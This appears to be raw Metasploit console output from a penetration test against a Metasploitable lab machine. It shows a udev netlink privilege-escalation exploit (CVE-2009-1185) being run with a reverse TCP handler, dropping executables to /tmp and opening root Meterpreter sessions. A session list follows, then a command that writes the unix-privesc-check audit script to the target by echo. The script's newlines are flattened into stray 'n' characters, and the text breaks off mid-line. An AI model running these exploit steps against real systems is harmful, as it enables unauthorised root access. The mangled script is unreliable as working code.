Linux x64 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- NetlinkPID no Usually udevd pid-1. Meterpreter sessions will autodetect SESSION 3 yes The session to run this module on. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) Payload information: Description: Versions of udev < 1.4.1 do not verify that netlink messages are coming from the kernel. This allows local users to gain privileges by sending netlink messages from userland. References: http://cvedetails.com/cve/2009-1185/ http://www.osvdb.org/53810 http://www.securityfocus.com/bid/34536 Started reverse TCP handler on 192.168.26.207:4444 Attempting to autodetect netlink pid... Meterpreter session, using get_processes to find netlink pid udev pid: 2352 Found netlink pid: 2351 Writing payload executable (155 bytes) to /tmp/vMcnFDaLCv Writing exploit executable (1879 bytes) to /tmp/jbuSlmKnHp chmod'ing and running it... Transmitting intermediate stager for over-sized stage...(105 bytes) Sending stage (1495599 bytes) to 192.168.26.134 Meterpreter session 10 opened (192.168.26.207:4444 -> 192.168.26.134:53183) at 2016-05-26 12:40:59 +0100 > Background session 10? [y/N] Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell unix 192.168.26.207:4444 -> 192.168.26.134:55144 (192.168.26.134) 2 shell unix 192.168.26.207:4444 -> 192.168.26.134:55146 (192.168.26.134) 3 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable 192.168.26.207:4433 -> 192.168.26.134:44060 (192.168.26.134) 4 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable 192.168.26.207:4433 -> 192.168.26.134:44061 (192.168.26.134) 5 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable 192.168.26.207:4444 -> 192.168.26.134:53178 (192.168.26.134) 6 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable 192.168.26.207:4444 -> 192.168.26.134:53179 (192.168.26.134) 7 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable 192.168.26.207:4444 -> 192.168.26.134:53180 (192.168.26.134) 8 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable 192.168.26.207:4444 -> 192.168.26.134:53181 (192.168.26.134) 9 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable 192.168.26.207:4444 -> 192.168.26.134:53182 (192.168.26.134) 10 meterpreter x86/linux 192.168.26.207:4444 -> 192.168.26.134:53183 (192.168.26.134) Choose SHELL sessions Running 'echo -e "#!/bin/shn# unix-privesc-check - Checks Unix system for simple privilege escalationsn# Copyright (C) 2008 pentestmonkey@pentestmonkey.netn#n#n# Licensen# -------n# This tool may be used for legal purposes only. Users take full responsibilityn# for any actions performed using this tool. The author accepts no liabilityn# for damage caused by this tool. If you do not accept these condition thenn# you are prohibited from using this tool.n#n# In all other respects the GPL version 2 applies:n#n# This program is free software; you can redistribute it and/or modifyn# it under the terms of the GNU General Public License version 2 asn# published by the Free Software Foundation.n#n# This program is distributed in the hope that it will be useful,n# but WITHOUT ANY WARRANTY; without even the implied warranty ofn# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See then# GNU General Public License for more details.n#n# You should have received a copy of the GNU General Public License alongn# with this program; if not, write to the Free Software Foundation, Inc.,n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.n#n# You are encouraged to send comments, improvements or suggestions ton# me at pentestmonkey@pentestmonkey.netn#n#n# Descriptionn# -----------n# Auditing tool to check for weak file permissions and other problems thatn# may allow local attackers to escalate privileges.n# n# It is intended to be run by security auditors and pentetration testers n# against systems they have been engaged to assess, and also by system n# admnisitrators who want to check for "obvious" misconfigurations. It n# can even be run as a cron job so you can check regularly for misconfigurations n# that might be introduced.n#n# Ensure that you have the appropriate legal permission before running itn# someone else's system.n#n# TODO Listn# ---------n# There's still plenty that this script doesn't do...n# - Doesn't work for shell scripts! These appear as "/bin/sh my.sh" in the process listing. n# This script only checks the perms of /bin/sh. Not what we're after. :-(n# - Similarly for perl scripts. Probably python, etc. too.n# - Check /proc/pid/cmdline for absolute path names. Check security of these (e.g. /etc/snmp/snmpd.conf)n# - Check everything in root's path - how to find root's path?n# - /proc/pid/maps, smaps are readable and lists some shared objects. We should check these.n# - /proc/pid/fd contain symlinks to all open files (but you can't see other people FDs)n# - check for trust relationships in /etc/hosts.equivn# - NFS imports / exports / automountern# - Insecure stuff in /etc/fstab (e.g. allowing users to mount file systems)n# - Inspecting people's PATH. tricky. maybe read from /proc/pid/environ, .bashrc, /etc/profile, .bash_profilen# - Check if /etc/init.d/* scripts are readable. Advise user to audit them if they are.n# - .exrc?n# - X11 trusts, apache passwd files, mysql trusts?n# - Daemons configured in an insecure way: tftpd, sadmind, rexdn# - World writable dirs aren't as bad if the sticky bit is set. Check for this before reporting vulns.n# - Maybe do a strings of binaries (and their .so's?)n# - Do a better job of parsing cron lines - search for full pathsn# - Maybe LDPATHs from /etc/env.dn# - Check if ldd, ld.so.conf changes have broken this script on non-linux systems.n# - Avoid check certain paths e.g. /-/_ clearly isn't a real directory.n# - create some sort of readable reportn# - indicate when it's likely a result is a false positive and when it's not.n# - Skip pseudo processes e.g. [usb-storage]n# - File permission on kernel modulesn# - Replace calls to echo with a my_echo func. Should be passed a string and an "importance" value:n# - my_echo 1 "This is important and should always be printed out"n# - my_echo 2 "This is less important and should only be printed in verbose mode"n# - We check some files / dirs multiple times. Slow. Can we implement a cache?n# - grep for PRIVATE KEY to find private ssh and ssl keys. Where to grep?n# - check SGID programsnnVERSION="1.4"nHOME_DIR_FILES=".netrc .ssh/id_rsa .ssh/id_dsa .rhosts .shosts .my.cnf .ssh/authorized_keys .bash_history .sh_history .forward"nCONFIG_FILES="/etc/passwd /etc/group /etc/master.passwd /etc/inittab /etc/inetd.conf /etc/xinetd.con /etc/xinetd.d/* /etc/contab /etc/fstab /etc/profile /etc/sudoers"nPGDIRS="/usr/local/pgsql/data ~postgres/postgresql/data ~postgres/data ~pgsql/data ~pgsql/pgsql/data /var/lib/postgresql/data /etc/postgresql/8.2/main /var/lib/pgsql/data"nnget_owner () {n GET_OWNER_FILE=$1n GET_OWNER_RETURN=`ls -lLd "$GET_OWNER_FILE" | awk '{print $3}'`n}nnget_group () {n GET_GROUP_FILE=$1n GET_GROUP_RETURN=`ls -lLd "$GET_GROUP_FILE" | awk '{print $4}'`n}nnusage () {n echo "unix-privesc-check v$VERSION ( http://pentestmonkey.net/tools/unix-privesc-check )"n echon echo "Usage: unix-privesc-check { standard | detailed }"n echon echo '"standard" mode: Speed-optimised check of lots of security settings.'n echo n echo '"detailed" mode: Same as standard mode, but also checks perms of open file'n echo ' handles and called files (e.g. parsed from shell scripts,'n echo ' linked .so files). This mode is slow and prone to false 'n echo ' positives but might help you find more subtle flaws in 3rd'n echo ' party programs.'n echon echo "This script checks file permissions and other settings that could allow"n echo "local users to escalate privileges."n echo n echo "Use of this script is only permitted on systems which you have been granted" n echo "legal permission to perform a security assessment of. Apart from this "n echo "condition the GPL v2 applies."n echon echo "Search the output for the word 'WARNING'. If you don't see it then this"n echo "script didn't find any problems."n echo n}nnbanner () {n echo "Starting unix-privesc-check v$VERSION ( http://pentestmonkey.net/tools/unix-privesc-check )"n echon echo "This script checks file permissions and other settings that could allow"n echo "local users to escalate privileges."n echo n echo "Use of this script is only permitted on systems which you have been granted" n echo "legal permission to perform a security assessment of. Apart from this "n echo "condition the GPL v2 applies."n echon echo "Search the output below for the word 'WARNING'. If you don't see it then"n echo "this script didn't find any problems."n echo n}nnMODE=$1nnif [ ! "$MODE" = "standard" ] && [ ! "$MODE" = "detailed" ]; thenn usagen exit 0nfinn# Parse any full paths from $1 (config files, progs, dirs).n# Check the permissions on each of these.ncheck_called_programs () {n CCP_MESSAGE_STACK=$1n CCP_FILE=$2n CCP_USER=$3n CCP_PATH=$4 # optionalnn # Check the perms of the supplied file regardlessn # The caller doesn't want to have to call check_perms as well as check_called_programsn check_perms "$CCP_MESSAGE_STACK" "$CCP_FILE" "$CCP_USER" "$CCP_PATH"nn # Skip the slow check if we're in quick moden if [ "$MODE" = "standard" ]; thenn return 0;n finn # Check if file is text or notn IS_TEXT=`file "$CCP_FILE" | grep -i text`n IS_DYNBIN=`file "$CCP_FILE" | grep -i 'dynamically linked'`nn # Process shell scripts (would also work on config files that reference other files)n if [ ! -z "$IS_TEXT" ]; thenn # Parse full paths from file - ignoring commented linesn CALLED_FILES=`grep -v '^#' "$CCP_FILE" | sed -e 's/^[^/]*//' -e 's/["''':}$]/x0a/g' | grep '/' | sed -e 's/[ *].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`n for CALLED_FILE in $CALLED_FILES; don # echo "$CCP_FILE contains a reference to $CALLED_FILE. Checking perms."n check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"n donen elsen # Process dynamically linked binariesn if [ ! -z "$IS_DYNBIN" ]; thenn n CALLED_FILES=`ldd "$CCP_FILE" 2>/dev/null | grep '/' | sed 's/[^/]*////' | cut -f 1 -d ' '`n for CALLED_FILE in $CALLED_FILES; don check_perms "$CCP_MESSAGE_STACK $CCP_FILE uses the library $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"n donen n # Strings binary to look for hard-coded config files n # or other programs that might be called.n for CALLED_FILE in `strings "$CCP_FILE" | sed -e 's/^[^/]*//' -e 's/["''':}$]/x0a/g' | grep '/' | sed -e 's/[ *].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`; don check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"n donen fin fin}nn# Parse any full paths from $1 (config files, progs, dirs).n# Check the permissions on each of these.ncheck_called_programs_suid () {n CCP_FILE=$1n CCP_PATH=$2 # optionalnn get_owner $CCP_FILE; CCP_USER=$GET_OWNER_RETURNn CCP_MESSAGE_STACK="$CCP_FILE is SUID $CCP_USER."n LS=`ls -l $CCP_FILE`n echo "Checking SUID-$CCP_USER program $CCP_FILE: $LS"nn # Don't check perms of executable itselfn # check_perms "$CCP_MESSAGE_STACK" "$CCP_FILE" "$CCP_USER" "$CCP_PATH"nn # Check if file is text or notn IS_TEXT=`file "$CCP_FILE" | grep -i text`n IS_DYNBIN=`file "$CCP_FILE" | grep -i 'dynamically linked'`nn # Process shell scripts (would also work on config files that reference other files)n if [ ! -z "$IS_TEXT" ]; thenn # Skip the slow check if we're in quick moden if [ "$MODE" = "standard" ]; thenn return 0;n finn # Parse full paths from file - ignoring commented linesn CALLED_FILES=`grep -v '^#' "$CCP_FILE" | sed -e 's/^[^/]*//' -e 's/["''':}$]/x0a/g' | grep '/' | sed -e 's/[ *].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`n for CALLED_FILE in $CALLED_FILES; don # echo "$CCP_FILE contains a reference to $CALLED_FILE. Checking perms."n check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"n donen elsen # Process dynamically linked binariesn if [ ! -z "$IS_DYNBIN" ]; thenn n CALLED_FILES=`ldd "$CCP_FILE" 2>/dev/null | grep '/' | sed 's/[^/]*////' | cut -f 1 -d ' '`n for CALLED_FILE in $CALLED_FILES; don check_perms "$CCP_MESSAGE_STACK $CCP_FILE uses the library $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"n donen n # Skip the slow check if we're in quick moden if [ "$MODE" = "standard" ]; thenn return 0;n finn # Strings binary to look for hard-coded config files n # or other programs that might be called.n for CALLED_FILE in `strings "$CCP_FILE" | sed -e 's/^[^/]*//' -e 's/["''':}$]/x0a/g' | grep '/' | sed -e 's/[ *].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`; don check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"n donen fin fin}nn# Check if $1 can be changed by users who are not $2ncheck_perms () {n CP_MESSAGE_STACK=$1n CHECK_PERMS_FILE=$2n CHECK_PERMS_USER=$3n CHECK_PERMS_PATH=$4 # optionalnn if [ ! -f "$CHECK_PERMS_FILE" ] && [ ! -d "$CHECK_PERMS_FILE" ] && [ ! -b "$CHECK_PERMS_FILE" ]; thenn CHECK_PERMS_FOUND=0n if [ ! -z "$CHECK_PERMS_PATH" ]; then n # Look for it in the supplied pathn for DIR in `echo "$CHECK_PERMS_PATH" | sed 's/:/ /g'`; don if [ -f "$DIR/$CHECK_PERMS_FILE" ]; thenn CHECK_PERMS_FOUND=1n CHECK_PERMS_FILE="$DIR/$CHECK_PERMS_FILE"n breakn fin donen fin n #if [ "$CHECK_PERMS_FOUND" = "0" ]; thenn # echo "ERROR: File $CHECK_PERMS_FILE doesn't exist. Checking parent path anyway."n # # return 0n # fin finn C=`echo "$CHECK_PERMS_FILE" | cut -c 1`n if [ ! "$C" = "/" ]; thenn echo "ERROR: Can't find absolute path for $CHECK_PERMS_FILE. Skipping."n return 0n finn echo " Checking if anyone except $CHECK_PERMS_USER can change $CHECK_PERMS_FILE"nn while [ -n "$CHECK_PERMS_FILE" ]; don perms_secure "$CP_MESSAGE_STACK" $CHECK_PERMS_FILE $CHECK_PERMS_USERn CHECK_PERMS_FILE=`echo $CHECK_PERMS_FILE | sed 's//[^/]*$//'`n donen}nn# Check if $1 can be read by users who are not $2ncheck_read_perms () {n CP_MESSAGE_STACK=$1n CHECK_PERMS_FILE=$2n CHECK_PERMS_USER=$3nn if [ ! -f "$CHECK_PERMS_FILE" ] && [ ! -b "$CHECK_PERMS_FILE" ]; thenn echo "ERROR: File $CHECK_PERMS_FILE doesn't exist"n return 0n finn echo " Checking if anyone except $CHECK_PERMS_USER can read file $CHECK_PERMS_FILE"nn perms_secure_read "$CP_MESSAGE_STACK" "$CHECK_PERMS_FILE" "$CHECK_PERMS_USER"n}nnperms_secure_read () {n PS_MESSAGE_STACK=$1n PERMS_SECURE_FILE=$2n PERMS_SECURE_USER=$3nn if [ ! -b "$PERMS_SECURE_FILE" ] && [ ! -f "$PERMS_SECURE_FILE" ] && [ ! -d "$PERMS_SECURE_FILE" ]; thenn echo "ERROR: No such file or directory: $PERMS_SECURE_FILE. Skipping."n return 0n finn # Check if owner is different (but ignore root ownership, that's OK)n only_user_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USERn n # Check group read perm (but ignore root group, that's OK)n group_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USERnn # Check world read perm n world_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILEn}nnperms_secure () {n PS_MESSAGE_STACK=$1n PERMS_SECURE_FILE=$2n PERMS_SECURE_USER=$3nn if [ ! -d "$PERMS_SECURE_FILE" ] && [ ! -f "$PERMS_SECURE_FILE" ] && [ ! -b "$PERMS_SECURE_FILE" ]; thenn # echo "ERROR: No such file or directory: $PERMS_SECURE_FILE. Skipping."n return 0n finn # Check if owner is different (but ignore root ownership, that's OK)n only_user_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USERn n # Check group write perm (but ignore root group, that's OK)n group_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USERnn # Check world write perm n world_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILEn}nnonly_user_can_write () {n O_MESSAGE_STACK=$1n O_FILE=$2n O_USER=$3nn # We just need to check the owner really as the ownern # can always grant themselves write accessn get_owner $O_FILE; O_FILE_USER=$GET_OWNER_RETURNn if [ ! "$O_USER" = "$O_FILE_USER" ] && [ ! "$O_FILE_USER" = "root" ]; thenn echo "WARNING: $O_MESSAGE_STACK The user $O_FILE_USER can write to $O_FILE"n fin}nngroup_can_write () {n O_MESSAGE_STACK=$1n O_FILE=$2n O_USER=$3 # ignore group write access $3 is only member of groupnn get_group $O_FILE; O_FILE_GROUP=$GET_GROUP_RETURNn P=`ls -lLd $O_FILE | cut -c 6`n if [ "$P" = "w" ] && [ ! "$O_GROUP" = "root" ]; thenn # check the group actually has some members other than $O_USERn group_has_other_members "$O_FILE_GROUP" "$O_USER"; # sets OTHER_MEMBERS to 1 or 0n if [ "$OTHER_MEMBERS" = "1" ]; thenn echo "WARNING: $O_MESSAGE_STACK The group $O_FILE_GROUP can write to $O_FILE"n fin fin}nngroup_has_other_members () {n G_GROUP=$1n G_USER=$2nn # If LDAP/NIS is being used this script can't check group membershipsn # we therefore assume the worst.n if [ "$EXT_AUTH" = 1 ]; thenn OTHER_MEMBERS=1n return 1n finn GROUP_LINE=`grep "^$G_GROUP:" /etc/group`n MEMBERS=`echo "$GROUP_LINE" | cut -f 4 -d : | sed 's/,/ /g'`nn GID=`echo "$GROUP_LINE" | cut -f 3 -d :`n EXTRA_MEMBERS=`grep "^[^:]*:[^:]*:-9]*:$GID:" /etc/passwd | cut -f 1 -d : | xargs echo`nn for M in $MEMBERS; don if [ ! "$M" = "$G_USER" ] && [ ! "$M" = "root" ]; thenn OTHER_MEMBERS=1n return 1n fin donenn for M in $EXTRA_MEMBERS; don if [ ! "$M" = "$G_USER" ] && [ ! "$M" = "root" ]; thenn OTHER_MEMBERS=1n return 1n fin donenn OTHER_MEMBERS=0n return 0n}nnworld_can_write () {n O_MESSAGE_STACK=$1n O_FILE=$2nn P=`ls -lLd $O_FILE | cut -c 9`n S=`ls -lLd $O_FILE | cut -c 10`nn if [ "$P" = "w" ]; thenn if [ "$S" = "t" ]; thenn echo "WARNING: $O_MESSAGE_STACK World write is set for $O_FILE (but sticky bit set)"n elsen echo "WARNING: $O_MESSAGE_STACK World write is set for $O_FILE"n fin fin}nnonly_user_can_read () {n O_MESSAGE_STACK=$1n O_FILE=$2n O_USER=$3nn # We just need to check the owner really as the ownern # can always grant themselves read accessn get_owner $O_FILE; O_FILE_USER=$GET_OWNER_RETURNn if [ ! "$O_USER" = "$O_FILE_USER" ] && [ ! "$O_FILE_USER" = "root" ]; thenn echo "WARNING: $O_MESSAGE_STACK The user $O_FILE_USER can read $O_FILE"n fin}nngroup_can_read () {n O_MESSAGE_STACK=$1n O_FILE=$2n O_USER=$3nn get_group $O_FILE; O_FILE_GROUP=$GET_GROUP_RETURNn P=`ls -lLd $O_FILE | cut -c 5`n if [ "$P" = "r" ] && [ ! "$O_GROUP" = "root" ]; thenn # check the group actually has some members other than $O_USERn group_has_other_members "$O_FILE_GROUP" "$O_USER"; # sets OTHER_MEMBERS to 1 or 0n if [ "$OTHER_MEMBERS" = "1" ]; thenn echo "WARNING: $O_MESSAGE_STACK The group $O_FILE_GROUP can read $O_FILE"n fin fin}nnworld_can_read () {n O_MESSAGE_STACK=$1n O_FILE=$2nn P=`ls -lLd $O_FILE | cut -c 8`nn if [ "$P" = "w" ]; thenn echo "WARNING: $O_MESSAGE_STACK World read is set for $O_FILE"n fin}nnsection () {n echon echo '############################################'n echo $1n echo '############################################'n}nn# Guess OSnif [ -x /usr/bin/showrev ]; thenn OS="solaris"n SHADOW="/etc/shadow"nelif [ -x /usr/sbin/sam -o -x /usr/bin/sam ]; thenn OS="hpux"n SHADOW="/etc/shadow"nelif [ -f /etc/master.passwd ]; thenn OS="bsd"n SHADOW="/etc/master.passwd"nelsen OS="linux"n SHADOW="/etc/shadow"nfinecho "Assuming the OS is: $OS"nCONFIG_FILES="$CONFIG_FILES $SHADOW"nn# Set path so we can access usual directories. HPUX and some linuxes don't have sbin in the path.nPATH=$PATH:/usr/bin:/bin:/sbin:/usr/sbin; export PATHnn# Check dependent programs are installedn# Assume "which" is installed!nPROGS="ls awk grep cat mount xargs file ldd strings"nfor PROG in $PROGS; don which $PROG 2>&1 > /dev/nulln if [ ! $? = "0" ]; thenn echo "ERROR: Dependend program '$PROG' is mising. Can't run. Sorry!"n exit 1n findonennbannernnsection "Recording hostname"nhostnamennsection "Recording uname"nuname -annsection "Recording Interface IP addresses"nif [ $OS = 'hpux' ]; thenn for IFACE in `lanscan | grep x | awk '{print $5}' 2>/dev/null`; don ifconfig $IFACE 2>/dev/nulln donenelsen ifconfig -anfinnsection "Checking if external authentication is allowed in /etc/passwd"nFLAG=`grep '^+:' /etc/passwd`nif [ -n "$FLAG" ]; thenn echo "WARNING: /etc/passwd allows external authentcation:"n grep '^+:' /etc/passwdn EXT_AUTH=1nelsen echo "No +:... line found in /etc/passwd"nfinnsection "Checking nsswitch.conf for addition authentication methods"nif [ -r "/etc/nsswitch.conf" ]; thenn NIS=`grep '^passwd' /etc/nsswitch.conf | grep 'nis'`n if [ -n "$NIS" ]; thenn echo "WARNING: NIS is used for authentication on this system"n EXT_AUTH=1n fin LDAP=`grep '^passwd' /etc/nsswitch.conf | grep 'ldap'`n if [ -n "$LDAP" ]; thenn echo "WARNING: LDAP is used for authentication on this system"n EXT_AUTH=1n finn if [ -z "$NIS" ] && [ -z "$LDAP" ]; thenn echo "Neither LDAP nor NIS are used for authentication"n finelsen echo "ERROR: File /etc/nsswitch.conf isn't readable. Skipping checks."nfinn# Check important config files aren't writablensection "Checking for writable config files"nfor FILE in $CONFIG_FILES; don if [ -f "$FILE" ]; thenn check_perms "$FILE is a critical config file." "$FILE" rootn findonennsection "Checking if $SHADOW is readable"ncheck_read_perms "/etc/shadow holds authentication data" $SHADOW rootnnsection "Checking for password hashes in /etc/passwd"nFLAG=`grep -v '^[^:]*:[x*]*:' /etc/passwd | grep -v '^#'`nif [ -n "$FLAG" ]; thenn echo "WARNING: There seem to be some password hashes in /etc/passwd"n grep -v '^[^:]*:[x*]*:' /etc/passwd | grep -v '^#'n EXT_AUTH=1nelsen echo "No password hashes found in /etc/passwd"nfinnsection "Checking account settings"n# Check for something nasty like r00t::0:0::/:/bin/sh in /etc/passwdn# We only need read access to /etc/passwd to be able to check this.nif [ -r "/etc/passwd" ]; thenn OPEN=`grep "^[^:][^:]*::" /etc/passwd | cut -f 1 -d ":"`n if [ -n "$OPEN" ]; thenn echo "WARNING: The following accounts have no password:"n grep "^[^:][^:]*::" /etc/passwd | cut -f 1 -d ":"n finfinif [ -r "$SHADOW" ]; thenn echo "Checking for accounts with no passwords"n if [ "$OS" = "linux" ]; thenn passwd -S -a | while read LINEn don USER=`echo "$LINE" | awk '{print $1}'`n STATUS=`echo "$LINE" | awk '{print $2}'`n if [ "$STATUS" = "NP" ]; thenn echo "WARNING: User $USER doesn't have a password"n fin donen elif [ "$OS" = "solaris" ]; thenn passwd -s -a | while read LINEn don USER=`echo "$LINE" | awk '{print $1}'`n STATUS=`echo "$LINE" | awk '{print $2}'`n if [ "$STATUS" = "NP" ]; thenn echo "WARNING: User $USER doesn't have a password"n fin donen finelsen echo "File $SHADOW isn't readable. Skipping some checks."nfinnsection "Checking library directories from /etc/ld.so.conf"nif [ -f "/etc/ld.so.conf" ] && [ -r "/etc/ld.so.conf" ]; thenn for DIR in `grep '^/' /etc/ld.so.conf`; don check_perms "$DIR is in /etc/ld.so.conf." $DIR rootn donenn #FILES=`grep '^include' /etc/ld.so.conf | sed 's/^include *//'`n #if [ ! -z "$FILES" ]; thenn # for DIR in `echo $FILES | xargs cat | sort -u`; don # donen #finelsen echo "File /etc/ld.so.conf not present. Skipping checks."nfinn# Check sudoers if we have permission - needs root normallynsection "Checking sudo configuration"nif [ -f "/etc/sudoers" ] && [ -r "/etc/sudoers" ]; thenn echo -----------------n echo "Checking if sudo is configured"n SUDO_USERS=`grep -v '^#' /etc/sudoers | grep -v '^[ t]*$' | grep -v '^[ t]*Default' | grep =`n if [ ! -z "$SUDO_USERS" ]; thenn echo "WARNING: Sudo is configured. Manually check nothing unsafe is allowed:"n grep -v '^#' /etc/sudoers | grep -v '^[ t]*$' | grep = | grep -v '^[ t]*Default'n finn echo -----------------n echo "Checking sudo users need a password"n SUDO_NOPASSWD=`grep -v '^#' /etc/sudoers | grep -v '^[ t]*$' | grep NOPASSWD`n if [ ! -z "$SUDO_NOPASSWD" ]; thenn echo "WARNING: Some users can use sudo without a password:"n grep -v '^#' /etc/sudoers | grep -v '^[ t]*$' | grep NOPASSWDn finelsen echo "File /etc/sudoers not present. Skipping checks."nfinnsection "Checking permissions on swap file(s)"nfor SWAP in `swapon -s | grep -v '^Filename' | cut -f 1 -d ' '`; don check_perms "$SWAP is used for swap space." $SWAP root n check_read_perms "$SWAP is used for swap space." $SWAP root ndonennsection "Checking programs run from inittab"nif [ -f "/etc/inittab" ] && [ -r "/etc/inittab" ]; thenn for FILE in `cat /etc/inittab | grep : | grep -v '^#' | cut -f 4 -d : | grep '/' | cut -f 1 -d ' ' | sort -u`; don check_called_programs "$FILE is run from /etc/inittab as root." $FILE rootn donenelsen echo "File /etc/inittab not present. Skipping checks."nfinnsection "Checking postgres trust relationships"nfor DIR in $PGDIRS; don if [ -d "$DIR" ] && [ -r "$DIR/pg_hba.conf" ]; thenn grep -v '^#' "$DIR/pg_hba.conf" | grep -v '^[ t]*$' | while read LINEn don AUTH=`echo "$LINE" | awk '{print $NF}'`n if [ "$AUTH" = "trust" ]; thenn PGTRUST=1n echo "WARNING: Postgres trust configured in $DIR/pg_hba.conf: $LINE"n fin donen findonennPGVER1=`psql -U postgres template1 -c 'select version()' 2>/dev/null | grep version`nnif [ -n "$PGVER1" ]; then n PGTRUST=1n echo "WARNING: Can connect to local postgres database as \postgres\ without a password"nfinnPGVER2=`psql -U pgsql template1 -c 'select version()' 2>/dev/null | grep version`nnif [ -n "$PGVER2" ]; then n PGTRUST=1n echo "WARNING: Can connect to local postgres database as \pgsql\ without a password"nfinnif [ -z "$PGTRUST" ]; thenn echo "No postgres trusts detected"nfinn# Check device files for mounted file systems are securen# cat /proc/mounts | while read LINE # Doesn't work so well when LVM is used - need to be rootnsection "Checking permissions on device files for mounted partitions"nif [ "$OS" = "linux" ]; thenn mount | while read LINEn don DEVICE=`echo "$LINE" | awk '{print $1}'`n FS=`echo "$LINE" | awk '{print $5}'`n if [ "$FS" = "ext2" ] || [ "$FS" = "ext3" ] ||[ "$FS" = "reiserfs" ]; thenn echo "Checking device $DEVICE"n check_perms "$DEVICE is a mounted file system." $DEVICE rootn fin donenelif [ "$OS" = "bsd" ]; thenn mount | grep ufs | while read LINEn don DEVICE=`echo "$LINE" | awk '{print $1}'`n echo "Checking device $DEVICE"n check_perms "$DEVICE is a mounted file system." $DEVICE rootn donenelif [ "$OS" = "solaris" ]; thenn mount | grep xattr | while read LINEn don DEVICE=`echo "$LINE" | awk '{print $3}'`n if [ ! "$DEVICE" = "swap" ]; thenn echo "Checking device $DEVICE"n check_perms "$DEVICE is a mounted file system." $DEVICE rootn fin donenelif [ "$OS" = "hpux" ]; thenn mount | while read LINEn don DEVICE=`echo "$LINE" | awk '{print $3}'`n C=`echo $DEVICE | cut -c 1`n if [ "$C" = "/" ]; thenn echo "Checking device $DEVICE"n check_perms "$DEVICE is a mounted file system." $DEVICE rootn fin donenn NFS=`mount | grep NFS`n if [ -n "$NFS" ]; thenn echo "WARNING: This system is an NFS client. Check for nosuid and nodev options."n mount | grep NFSn finfinn# Check cron jobs if they're readablen# TODO check that cron is actually runningnsection "Checking cron job programs aren't writable (/etc/crontab)"nCRONDIRS=""nif [ -f "/etc/crontab" ] && [ -r "/etc/crontab" ]; thenn MYPATH=`grep '^PATH=' /etc/crontab | cut -f 2 -d = `n echo Crontab path is $MYPATHnn # Check if /etc/cron.(hourly|daily|weekly|monthly) are being usedn CRONDIRS=`grep -v '^#' /etc/crontab | grep -v '^[ t]*$' | grep '[ t][^ t][^ t]*[ t][ t]*' | grep run-crons`nn # Process run-partsn grep -v '^#' /etc/crontab | grep -v '^[ t]*$' | grep '[ t][^ t][^ t]*[ t][ t]*' | grep run-parts | while read LINEn don echo "Processing crontab run-parts entry: $LINE"n USER=`echo "$LINE" | awk '{print $6}'`n DIR=`echo "$LINE" | sed 's/.*run-parts[^()&|;/]*(/[^ ]*).*/1/'`n check_perms "$DIR holds cron jobs which are run as $USER." "$DIR" "$USER"n if [ -d "$DIR" ]; thenn echo " Checking directory: $DIR"n for FILE in $DIR/*; don FILENAME=`echo "$FILE" | sed 's/.*///'`n if [ "$FILENAME" = "*" ]; then n echo " No files in this directory."n continuen fin check_called_programs "$FILE is run by cron as $USER." "$FILE" "$USER"n donen fin donenn # TODO bsd'd periodic:n # 1 3 * * * root periodic dailyn # 15 4 * * 6 root periodic weeklyn # 30 5 1 * * root periodic monthlynn grep -v '^#' /etc/crontab | grep -v '^[ ]*$' | grep '[ ][^ ][^ ]*[ ][ ]*' | while read LINEn do n echo "Processing crontab entry: $LINE"n USER=`echo "$LINE" | awk '{print $6}'`n PROG=`echo "$LINE" | awk '{print $7}'`n check_called_programs "$PROG is run from crontab as $USER." $PROG $USER $MYPATHn donenelsen echo "File /etc/crontab not present. Skipping checks."nfinn# Do this if run-crons is run from /etc/crontabnif [ -n "$CRONDIRS" ]; thenn USER=`echo "$CRONDIRS" | awk '{print $6}'`n section "Checking /etc/cron.(hourly|daily|weekly|monthly)"n for DIR in hourly daily weekly monthly; don if [ -d "/etc/cron.$DIR" ]; thenn echo " Checking directory: /etc/cron.$DIR"n for FILE in /etc/cron.$DIR/*; don FILENAME=`echo "$FILE" | sed 's/.*///'`n if [ "$FILENAME" = "*" ]; then n echo "No files in this directory."n continuen fin check_called_programs "$FILE is run via cron as $USER." "$FILE" $USERn donen fin donenfinnsection "Checking cron job programs aren't writable (/var/spool/cron/crontabs)"nif [ -d "/var/spool/cron/crontabs" ]; thenn for FILE in /var/spool/cron/crontabs/*; do n USER=`echo "$FILE" | sed 